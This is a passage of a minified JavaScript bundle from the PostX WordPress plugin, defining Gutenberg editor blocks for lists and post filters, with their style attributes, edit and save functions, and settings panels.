.block-editor-block-list__layout"}]},wrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list),\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout"}]},wrapShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list),\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout"}]},wrapRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list),\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { border-radius:{{wrapRadius}}; }"}]},wrapHoverBackground:{type:"object",default:{openColor:0,type:"color",color:"#037fff"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list):hover,\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover"}]},wrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list):hover,\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover"}]},wrapHoverRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list):hover,\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover { border-radius:{{wrapHoverRadius}}; }"}]},wrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list):hover,\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout:hover"}]},wrapMargin:{type:"object",default:{lg:{top:"",bottom:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list),\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { margin:{{wrapMargin}}; }"}]},wrapOuterPadding:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-list-wrapper:has(> .wp-block-ultimate-post-list),\n            {{ULTP}} .ultp-list-wrapper > .block-editor-inner-blocks .block-editor-block-list__layout { padding:{{wrapOuterPadding}}; }"}]},advanceId:{type:"string",default:""},advanceZindex:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-list-wrapper { z-index:{{advanceZindex}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"{{ULTP}} {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]}}},43053:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(43166),n=l(36988),r=l(65839),s=l(82402);const{__}=wp.i18n,{registerBlockType:p,createBlock:c}=wp.blocks,u=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/list-block/","block_docs");p(s,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/advanced-list.svg",alt:"List PostX"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("Create & customize bullets and numbered lists.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:u,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:r.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/list.svg"}},transforms:{from:[{type:"block",blocks:["core/list"],transform:()=>c("ultimate-post/advanced-list",{previewImg:ultp_data.url+"assets/img/preview/list.svg"})}]},edit:i.Z,save:n.Z})},67532:(e,t,l)=>{"use strict";l.d(t,{Z:()=>w});var o=l(67294),a=l(53049),i=l(99838),n=l(41557),r=l(69735),s=l(64766),p=l(17151);const{__}=wp.i18n,{InspectorControls:c,RichText:u,useBlockProps:d}=wp.blockEditor,{useState:m,useEffect:g,Fragment:y}=wp.element,{Dropdown:b}=wp.components,{createBlock:v}=wp.blocks,{select:h}=wp.data,{getBlockAttributes:f,getBlockRootClientId:k}=wp.data.select("core/block-editor");function w(e){const[t,l]=m("Content"),{setAttributes:w,className:x,name:T,attributes:_,clientId:C,attributes:{blockId:E,advanceId:S,listText:P,listCustomImg:L,listIconType:I,subtext:B,listSinleCustomIcon:U,dcEnabled:M,currentPostId:A}}=e;g((()=>{const e=C.substr(0,6),t=f(k(C));(0,a.qi)(w,t,A,C),E?E&&E!=e&&(t?.hasOwnProperty("ref")||(0,a.k0)()||t?.hasOwnProperty("theme")||w({blockId:e})):w({blockId:e})}),[C]);const H={setAttributes:w,name:T,attributes:_,setSection:l,section:t,clientId:C};let N;E&&(N=(0,i.Kh)(_,"ultimate-post/list",E,(0,a.k0)()));const j=h("core/block-editor").getBlockParents(C),Z=h("core/block-editor").getBlockAttributes(j[j.length-1]),{listGroupCustomImg:O,listGroupIconType:R,listDisableText:D,layout:z,listGroupSubtextEnable:F,listGroupBelowIcon:W,listCustomIcon:V,enableIcon:G,listLayout:q}=Z;g((()=>{w({listGroupCustomImg:O,listGroupIconType:R,listDisableText:D,listGroupBelowIcon:W,listGroupSubtextEnable:F,listCustomIcon:V,layout:z,enableIcon:G,listLayout:q})}),[z,G,q,V,D,R,W,O,F]);const $=W&&"layout3"!=z?"div":y;function K(e){return"default"!=R&&(I==e||"inherit"==I&&R==e)||""==I&&R==e}const J=K("image"),Y=K("icon"),X=d({...S&&{id:S},className:`ultp-block-${E} ${x}`});return(0,o.createElement)(y,null,(0,o.createElement)(c,null,(0,o.createElement)(p.Z,{store:H})),(0,o.createElement)("li",X,N&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:N}}),(0,o.createElement)("div",{className:"ultp-list-content"},(0,o.createElement)($,W&&"layout3"!=z&&{class:"ultp-list-heading"},"default"==R&&G&&(0,o.createElement)("div",{className:"ultp-list-texticon ultp-listicon-bg"}),J&&G&&(0,o.createElement)("div",{className:"ultp-listicon-bg"},(0,o.createElement)("img",{src:L.url&&"inherit"!=I?L.url:O.url,alt:"List Image"})),Y&&G&&(0,o.createElement)(b,{popoverProps:{placement:"bottom-start"},className:"ultp-listicon-dropdown",renderToggle:({onToggle:e,onClose:t})=>(0,o.createElement)("div",{onClick:()=>e(),className:"ultp-listicon-bg"},s.ZP[U.length>0&&"inherit"!=I?U:V]),renderContent:()=>(0,o.createElement)(n.Z,{inline:!0,value:U,label:"Update Single Icon",dynamicClass:" ",onChange:e=>H.setAttributes({listSinleCustomIcon:e,listIconType:"icon"})})}),!D&&(0,o.createElement)(u,{key:"editable",tagName:"div",className:"ultp-list-title",placeholder:__("List Text…","ultimate-post"),onChange:e=>w({listText:e}),allowedFormats:(0,r.o6)()&&M?["ultimate-post/dynamic-content"]:void 0,onReplace:(e,t,l)=>wp.data.dispatch("core/block-editor").replaceBlocks(C,e,t,l),onSplit:(e,t)=>v("ultimate-post/list",{..._,listText:e}),value:P})),!D&&F&&(0,o.createElement)("div",{className:"ultp-list-subtext"},(0,o.createElement)(u,{key:"editable",tagName:"span",placeholder:__("List Subtext Text…","ultimate-post"),onChange:e=>w({subtext:e}),value:B})))))}},36681:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{Fragment:a}=wp.element,{useBlockProps:i}=wp.blockEditor;function n(e){const{attributes:{blockId:t,advanceId:l,listText:n,listCustomImg:r,listIconType:s,listGroupSubtextEnable:p,subtext:c,listGroupCustomImg:u,listGroupIconType:d,listDisableText:m,listGroupBelowIcon:g,listCustomIcon:y,listSinleCustomIcon:b,layout:v,enableIcon:h}}=e,f=g&&"layout3"!=v?"div":a;function k(e){return"default"!=d&&(s==e||"inherit"==s&&d==e)||""==s&&d==e}const w=k("image"),x=k("icon"),T=i.save({...l&&{id:l},className:`ultp-block-${t}`});return(0,o.createElement)("li",T,(0,o.createElement)("div",{className:"ultp-list-content"},(0,o.createElement)(f,g&&"layout3"!=v&&{class:"ultp-list-heading"},"default"==d&&h&&(0,o.createElement)("div",{className:"ultp-list-texticon ultp-listicon-bg"}),w&&h&&(0,o.createElement)("div",{className:"ultp-listicon-bg"},(0,o.createElement)("img",{src:r.url?r.url:u.url,alt:"List Image"})),x&&h&&(0,o.createElement)("div",{className:"ultp-listicon-bg"},"_ultp_list_ic_"+(b.length>0&&"inherit"!=s?b:y)+"_ultp_list_ic_end_"),!m&&(0,o.createElement)("div",{className:"ultp-list-title",dangerouslySetInnerHTML:{__html:n}})),!m&&p&&(0,o.createElement)("div",{className:"ultp-list-subtext",dangerouslySetInnerHTML:{__html:c}})))}},17151:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294),a=l(53049),i=l(92637);const{__}=wp.i18n,n=({store:e})=>(0,o.createElement)(i.Sections,null,(0,o.createElement)(i.Section,{slug:"button",title:__("Button","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:[{position:1,data:{type:"tag",key:"listIconType",label:__("Icon Type","ultimate-post"),options:[{value:"icon",label:__("Icon","ultimate-post")},{value:"image",label:__("Image","ultimate-post")},{value:"inherit",label:__("Inherit","ultimate-post")},{value:"none",label:__("None","ultimate-post")}]}},{position:2,data:{type:"icon",key:"listSinleCustomIcon",label:__("Icon Store","ultimate-post")}},{position:3,data:{type:"media",key:"listCustomImg",label:__("Upload Custom Image","ultimate-post")}},{position:4,data:{type:"separator",label:__("Icon Style","ultimate-post")}},{position:5,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"listIconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"listIconBg",label:__("Icon  Background","ultimate-post")},{type:"border",key:"listIconBorder",label:__("Border","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"listIconHoverColor",label:__("Icon Hover Color","ultimate-post")},{type:"color",key:"listIconHoverBg",label:__("Icon Hover Background","ultimate-post")},{type:"border",key:"listIconHoverBorder",label:__("Hover Border","ultimate-post")}]}]}}],initialOpen:!0,store:e}),(0,o.createElement)(a.T,{title:__("Text","ultimate-post"),include:[{position:1,data:{type:"color",key:"listTextColor",label:__("Title Color","ultimate-post")}},{position:2,data:{type:"color",key:"listTextHoverColor",label:__("Title Hover Color","ultimate-post")}},{position:3,data:{type:"separator",key:"separator",label:__("Subtext","ultimate-post")}},{position:4,data:{type:"range",key:"subTextSpace",min:0,max:400,step:1,responsive:!0,label:__("Space Between Text & Subtext","ultimate-post"),unit:["px"]}},{position:5,data:{type:"color",key:"subTextColor",label:__("Subtext Color","ultimate-post")}},{position:9,data:{type:"color",key:"listSubtextHoverColor",label:__("Subtext Hover Color","ultimate-post")}}],initialOpen:!1,store:e})),(0,o.createElement)(i.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e})))},87383:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},currentPostId:{type:"string",default:""},layout:{type:"string",default:""},listGroupCustomImg:{type:"object",default:""},listGroupIconType:{type:"string",default:""},listDisableText:{type:"boolean",default:!0},listCustomIcon:{type:"string",default:""},listGroupSubtextEnable:{type:"boolean",default:!0},listGroupBelowIcon:{type:"boolean",default:!1},enableIcon:{type:"boolean",default:!0},listLayout:{type:"string",default:"number"},listText:{type:"string",default:""},listIconType:{type:"string",default:"",style:[{depends:[{key:"enableIcon",condition:"==",value:!0},{key:"listGroupIconType",condition:"!=",value:"default"}]}]},listSinleCustomIcon:{type:"string",default:"",style:[{depends:[{key:"listGroupIconType",condition:"!=",value:"default"},{key:"listIconType",condition:"==",value:"icon"}]}]},listCustomImg:{type:"object",default:"",style:[{depends:[{key:"listGroupIconType",condition:"!=",value:"default"},{key:"listIconType",condition:"==",value:"image"}]}]},listIconColor:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon:before { color:{{listIconColor}}; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon:before { background-color:{{listIconColor}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}} .ultp-listicon-bg svg { color:{{listIconColor}}; }"}]},listIconBg:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon:before { background: {{listIconBg}};}"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon { background: {{listIconBg}};}"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-listicon-bg { background: {{listIconBg}};}"}]},listIconBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon:before"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list .ultp-listicon-bg"}]},listIconHoverColor:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-texticon:before { color:{{listIconHoverColor}}; }"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-texticon:before { background-color:{{listIconHoverColor}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list:hover .ultp-listicon-bg svg { color:{{listIconHoverColor}}; }"}]},listIconHoverBg:{type:"string",default:"",style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:".block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon:before,\n                .ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-texticon:before { background: {{listIconHoverBg}};}"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-texticon { background-color:{{listIconHoverBg}}; }"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:"{{ULTP}}.wp-block-ultimate-post-list:hover .ultp-listicon-bg { background: {{listIconHoverBg}};}"}]},listIconHoverBorder:{type:"object",default:{openBorder:0,width:{top:2,right:2,bottom:2,left:2},color:"#dfdfdf"},style:[{depends:[{key:"listLayout",condition:"!=",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:".block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon:before,  \n                .ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-texticon:before"},{depends:[{key:"listLayout",condition:"==",value:"bullet"},{key:"listGroupIconType",condition:"==",value:"default"}],selector:".block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-list-texticon, \n                .ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-texticon"},{depends:[{key:"listGroupIconType",condition:"!=",value:"default"}],selector:".block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-listicon-bg, \n                .ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-listicon-bg"}]},listTextColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-list-title,\n            {{ULTP}} .ultp-list-title a { color:{{listTextColor}}; } "}]},listTextHoverColor:{type:"string",default:"",style:[{selector:"\n            .ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-title, \n            .ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-title a, \n            .block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-list-title, \n            .block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-list-title a { color:{{listTextHoverColor}}; } "}]},subtext:{type:"string",default:""},subTextSpace:{type:"object",default:{lg:"",ulg:"px"},style:[{depends:[{key:"layout",condition:"==",value:"layout3"},{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-subtext { margin-top:{{subTextSpace}}; }"},{depends:[{key:"layout",condition:"!=",value:"layout3"},{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-list-content { row-gap:{{subTextSpace}}; }"}]},subTextColor:{type:"string",default:"",style:[{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:"{{ULTP}}  .ultp-list-subtext { color:{{subTextColor}}; }"}]},listSubtextHoverColor:{type:"string",default:"",style:[{depends:[{key:"listGroupSubtextEnable",condition:"==",value:!0}],selector:".ultp-list-wrapper > {{ULTP}}.wp-block-ultimate-post-list:hover .ultp-list-subtext, \n            .block-editor-block-list__block:hover > {{ULTP}}.wp-block-ultimate-post-list .ultp-list-subtext { color:{{listSubtextHoverColor}}; }"}]},hideExtraLarge:{type:"boolean",default:!1,style:[{selector:"div:has(>\n            {{ULTP}}) {display:none;}"}]},hideTablet:{type:"boolean",default:!1,style:[{selector:"div:has(>\n            {{ULTP}}) {display:none;}"}]},hideMobile:{type:"boolean",default:!1,style:[{selector:"div:has(>\n            {{ULTP}}) {display:none;}"}]},advanceCss:{type:"string",default:"",style:[{selector:""}]},...l(69735).KF}},24570:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(87462),a=l(67294),i=l(83245),n=l(87383);const{Fragment:r}=wp.element,s=[{attributes:{...n.Z},save(e){const{attributes:{blockId:t,advanceId:l,listText:n,listCustomImg:s,listIconType:p,listGroupSubtextEnable:c,subtext:u,listGroupCustomImg:d,listGroupIconType:m,listDisableText:g,listGroupBelowIcon:y,listCustomIcon:b,listSinleCustomIcon:v,layout:h,enableIcon:f}}=e,k=y&&"layout3"!=h?"div":r;function w(e){return"default"!=m&&(p==e||"inherit"==p&&m==e)||""==p&&m==e}const x=w("image"),T=w("icon");return(0,a.createElement)("li",(0,o.Z)({},l&&{id:l},{className:`ultp-block-${t}`}),(0,a.createElement)("div",{className:"ultp-list-content"},(0,a.createElement)(k,y&&"layout3"!=h&&{class:"ultp-list-heading"},"default"==m&&f&&(0,a.createElement)("div",{className:"ultp-list-texticon ultp-listicon-bg"}),x&&f&&(0,a.createElement)("div",{className:"ultp-listicon-bg"},(0,a.createElement)("img",{src:s.url?s.url:d.url,alt:"List Image"})),T&&f&&(0,a.createElement)("div",{className:"ultp-listicon-bg"},i.ZP[v.length>0&&"inherit"!=p?v:b]),!g&&(0,a.createElement)("div",{className:"ultp-list-title",dangerouslySetInnerHTML:{__html:n}})),!g&&c&&(0,a.createElement)("div",{className:"ultp-list-subtext",dangerouslySetInnerHTML:{__html:u}})))}}]},82738:(e,t,l)=>{"use strict";var o=l(67294),a=l(67532),i=l(36681),n=l(87383),r=l(58063),s=l(24570);const{__}=wp.i18n,{registerBlockType:p}=wp.blocks;p(r,{parent:["ultimate-post/advanced-list"],icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/single-list.svg",alt:"List"}),attributes:n.Z,edit:a.Z,save:i.Z,deprecated:s.Z})},4902:(e,t,l)=>{"use strict";l.d(t,{Z:()=>y});var o=l(67294),a=l(53049),i=l(99838),n=l(99242);const{useBlockProps:r,useInnerBlocksProps:s}=wp.blockEditor,{useEffect:p}=wp.element,{useSelect:c}=wp.data,u=[["ultimate-post/filter-select",{type:"tags",allText:"All Tags"},[]],["ultimate-post/filter-select",{type:"category",allText:"All Categories"},[]],["ultimate-post/filter-select",{type:"order"},[]]],d=["ultimate-post/filter-select","ultimate-post/filter-clear","ultimate-post/filter-search-adv"],m=["ultimate-post/filter-select/tags","ultimate-post/filter-select/categories","ultimate-post/filter-select/order","ultimate-post/filter-clear","ultimate-post/filter-select/search","ultimate-post/filter-select/adv_sort"],g=new Set(["filter-select/adv_sort","filter-select/order_by","filter-select/order","filter-select/author","filter-clear","filter-search-adv"].map((e=>"editor-block-list-item-ultimate-post-"+e)));function y({attributes:e,setAttributes:t,clientId:l,context:y,isSelected:b}){const{blockId:v,currentPostId:h}=e;p((()=>{(0,a.qi)(t,"",h,l),t({blockId:l.slice(-6),clientId:l})}),[l]);const f=c((e=>e("core/block-editor").getBlocks(l)||[]));p((()=>{const{selectBlock:e}=wp.data.dispatch("core/block-editor");e(l)}),[f.length,l]),p((()=>{if(!b)return;const e=wp.data.subscribe((()=>{wp.data.select("core/block-editor").getBlocks(l).map((e=>"editor-block-list-item-"+e.name.replace("/","-")+(e.name.includes("filter-select")?"/"+e.attributes.type:""))).forEach((e=>{g.has(e)&&Array.from(document.getElementsByClassName(e)).forEach((e=>{e.ariaDisabled="true",e.style.pointerEvents="none"}))}))}));return()=>e()}),[b]);const k=s(r({className:`ultp-block-${v} ultp-filter-block`,"data-postid":y.postId}),{orientation:"horizontal",template:u,templateLock:!1,allowedBlocks:d,prioritizedInserterBlocks:m,templateInsertUpdatesSelection:!1});let w;return v&&(w=(0,i.Kh)(e,"ultimate-post/advanced-filter",v,(0,a.k0)())),(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.Z,{attributes:e,setAttributes:t,name:"ultimate-post/advanced-filter",clientId:l}),w&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:w}}),(0,o.createElement)("div",k))}},79060:(e,t,l)=>{"use strict";l.d(t,{Z:()=>n});var o=l(67294);const{useBlockProps:a,useInnerBlocksProps:i}=wp.blockEditor;function n({attributes:e}){const{blockId:t}=e,l=i.save(a.save({className:`ultp-block-${t} ultp-filter-block`}));return(0,o.createElement)("div",l)}},99242:(e,t,l)=>{"use strict";l.d(t,{Z:()=>s});var o=l(67294),a=l(53049),i=l(92637),n=l(31760);const{__}=wp.i18n,{InspectorControls:r}=wp.blockEditor;function s({name:e,attributes:t,setAttributes:l,clientId:s}){const p={setAttributes:l,name:e,attributes:t,clientId:s};return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(n.Z,{store:p,include:[{type:"adv_filter"},{type:"inserter",label:__("Add Filters","ultimate-post"),clientId:s}]}),(0,o.createElement)(r,null,(0,o.createElement)(i.SectionsNoTab,null,(0,o.createElement)(i.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.T,{title:"inline",include:a.wK,store:p,initialOpen:!0}))),(0,a.dH)()))}},70766:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},relation:{type:"string",default:"AND"},align:{type:"object",default:{lg:"flex-start"},style:[{selector:"{{ULTP}} { justify-content: {{align}}; }"}]},gapChild:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} { gap: {{gapChild}}; }"}]},spacingTop:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} { margin-top: {{spacingTop}} !important; }"}]},spacingBottom:{type:"object",default:{lg:"10",unit:"px"},style:[{selector:"{{ULTP}} { margin-bottom: {{spacingBottom}} !important; }"}]},inlineMultiSelect:{type:"boolean",default:!1}}},40044:(e,t,l)=>{"use strict";l.d(t,{Z:()=>a});var o=l(67294);function a({attributes:e,onChange:t}){const{clearButtonText:l}=e;return(0,o.createElement)("button",{className:"ultp-clear-button",onClick:t},l)}},14585:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(87462),a=l(67294),i=l(53049),n=l(99838),r=l(87025),s=l(40044),p=l(85291),c=l(27774);const{__}=wp.i18n,{useEffect:u}=wp.element,{useBlockProps:d}=wp.blockEditor,{useSelect:m}=wp.data,{selectBlock:g}=wp.data.dispatch("core/block-editor"),y="ultimate-post/filter-clear";function b({attributes:e,setAttributes:t,clientId:l,context:b,isSelected:v}){const{blockId:h}=e,f=b["advanced-filter/cId"],k=m((e=>{const t=e("core/block-editor").getBlocks(f);return(0,r.FL)(t).filter((e=>"ultimate-post/filter-select"===e.name))}),[f]),w=(0,r.NH)(k)||[];u((()=>{t({blockId:l.slice(-6)})}),[l]);const x=d({className:`ultp-block-${h} ultp-filter-clear`});let T;return h&&(T=(0,n.Kh)(e,y,h,(0,i.k0)())),(0,a.createElement)(a.Fragment,null,(0,a.createElement)(c.Z,{name:y,attributes:e,setAttributes:t,clientId:l}),T&&(0,a.createElement)("style",{dangerouslySetInnerHTML:{__html:T}}),(0,a.createElement)("div",{className:`ultp-block-${h}-wrapper`},(0,a.createElement)(a.Fragment,null,w.map(((e,t)=>Object.keys(e).map((t=>(0,a.createElement)("div",(0,o.Z)({},x,{key:t}),(0,a.createElement)(p.Z,{text:e[t],clientId:t,onChange:e=>(0,r.Dg)(e)})))))),(0,a.createElement)("div",x,(0,a.createElement)(s.Z,{attributes:e,onChange:()=>{w.forEach((e=>{Object.keys(e).forEach((e=>{(0,r.Dg)(e)}))})),g(l)}})))))}},85291:(e,t,l)=>{"use strict";l.d(t,{Z:()=>i});var o=l(67294),a=l(64766);function i({text:e,clientId:t,onChange:l}){return(0,o.createElement)("div",{className:"ultp-selected-filter"},(0,o.createElement)("span",{className:"ultp-selected-filter-icon",role:"button",onClick:()=>l(t)},a.ZP?.close_line),(0,o.createElement)("span",{className:"ultp-selected-filter-text"},e))}},27774:(e,t,l)=>{"use strict";l.d(t,{Z:()=>b});var o=l(67294),a=l(53049),i=l(87763),n=l(92637),r=l(31760);const{__}=wp.i18n,{InspectorControls:s}=wp.blockEditor,p=[{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignleft"}),value:"start",label:__("Left","ultimate-post")},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-justify"}),value:"center",label:__("Normal","ultimate-post")},{icon:(0,o.createElement)("span",{className:"dashicons dashicons-editor-alignright"}),value:"end",label:__("Right","ultimate-post")}],c=[{data:{type:"toggle",key:"cAlignEnable",label:__("Enable Alignement Controls","ultimate-post")}},{data:{type:"alignment",key:"cAlign",disableIf:e=>!e.cAlignEnable,responsive:!0,label:__("Alignment","ultimate-post"),options:p.map((e=>e.value))}},{data:{type:"tag",key:"clearButtonPosition",label:__("Position","ultimate-post"),options:[{value:"auto",label:__("Inline","ultimate-post")},{value:"100%",label:__("Block","ultimate-post")}]}},{data:{type:"text",key:"clearButtonText",label:__("Text","ultimate-post")}}],u=[{data:{type:"typography",key:"cbTypo",label:__("Typography","ultimate-post")}},{data:{type:"color",key:"cbColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"cbColorHover",label:__("Hover Color","ultimate-post")}},{data:{type:"color",key:"cbBgColor",label:__("Background Color","ultimate-post")}},{data:{type:"color",key:"cbBgHoverColor",label:__("Background Hover Color","ultimate-post")}},{data:{type:"border",key:"cbBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"cbBorderRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"boxshadow",key:"cbBoxShadow",label:__("BoxShadow","ultimate-post")}},{data:{type:"range",key:"gap",min:0,max:500,step:1,responsive:!0,unit:["px","em","rem"],label:__("Gap Between Items","ultimate-post")}},{data:{type:"dimension",key:"cbPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],d=[{data:{type:"typography",key:"sfTypo",label:__("Typography","ultimate-post")}},{data:{type:"range",key:"sfIconSize",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Icon Size","ultimate-post")}},{data:{type:"color",key:"sfColor",label:__("Color","ultimate-post")}},{data:{type:"color",key:"sfColorHover",label:__("Hover Color","ultimate-post")}},{data:{type:"color",key:"sfBgColor",label:__("Background Color","ultimate-post")}},{data:{type:"color",key:"sfBgHoverColor",label:__("Background Hover Color","ultimate-post")}},{data:{type:"border",key:"sfBorder",label:__("Border","ultimate-post")}},{data:{type:"dimension",key:"sfBorderRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}},{data:{type:"boxshadow",key:"sfBoxShadow",label:__("BoxShadow","ultimate-post")}},{data:{type:"dimension",key:"sfPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}}],m=e=>e.map((e=>e.data)),g=()=>[{isToolbar:!0,data:{type:"tab_toolbar",content:[{name:"clear_button_set",title:__("Clear Button 